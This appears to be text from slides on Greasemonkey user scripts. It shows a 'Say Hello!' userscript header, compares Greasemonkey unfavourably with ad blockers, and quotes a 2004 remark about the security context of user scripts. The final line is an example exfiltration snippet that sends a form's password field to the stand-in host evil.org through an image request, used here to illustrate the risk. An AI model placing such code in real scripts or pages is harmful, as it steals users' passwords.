

// ==UserScript== // @name Say Hello! // @namespace http://youngpup.net/userscripts // @description Greets the world // @include *google.com* // @include *youngpup.net* // @exclude http://mail.google.com/* // ==/UserScript== alert("Hello, world!");
There are much easier, more accessible, and more user-friendly ways to remove ads than Greasemonkey
All of these have huge militant communities of maintainers. Greasemonkey cannot possibly compare to them in ad-removal efficiency.
"User scripts run in content's security context. I don't see any possible problems..."
-- Aaron, November 2004
var img = new Image(); img.src="http://evil.org?yourpassword=" + document.forms[0][3].value